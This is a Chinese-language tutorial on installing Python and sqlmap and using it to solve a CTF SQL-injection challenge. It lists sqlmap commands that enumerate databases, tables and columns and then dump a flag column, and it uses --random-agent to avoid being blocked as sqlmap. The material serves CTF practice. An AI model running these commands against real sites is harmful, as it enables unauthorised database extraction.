关于sqlmap的配置和基本使用教程

    sqlmap是用python写的所以运行前得配置python环境。

首先进入https://www.python.org/downloads/    下载python ，一直默认安装就好了，如果需要安装到其他的盘可以修改，环境变量配置的时候注意一下就好了，安装完成后，进入cmd界面，输入python，如果安装成功应该可以出现这个界面。

 

 

然后进入http://sqlmap.org/  下载sqlmap，将下载后得到的压缩包文件解压并拷贝到安装python的文件夹。

然后在桌面新建一个cmd快捷方式，在新建的cmd快捷方式中设置起始位置为sqlmap的py程序所在的文件夹

 

 

打开sqlmap 输入如下指令 （此处测试网址为三叶草技术小组第八届极客大挑战sql注入题，请切勿恶意攻击！）

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent --dbs

这里的 --random-agent 是随机UA，我的理解是模拟浏览器，否则有的网址会因为发现是sqlmap而拒绝被访问。输入上面语句爆出数据库

因为这里的目的是得到flag，所以针对性的访问f1ag数据库。输入如下语句

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent -D "f1ag" --tables

得到f1ag里面的表，

（图中的字体比较奇怪，我把埚甩给了系统字体，，，，其实是flag  而不是f1ag  所以在构建语句的时候可以复制粘贴数据库中爆出的信息，不然有时候自己会很迷。）

得到数据库中的表然后是字段，输入下面语句

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent -D "f1ag" -T "flag" --columns

得到字段后，爆出字段内容，构造如下语句

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent -D "f1ag" -T "flag" -C "f4ag" --dump

就得到了flag，

 

---

 

over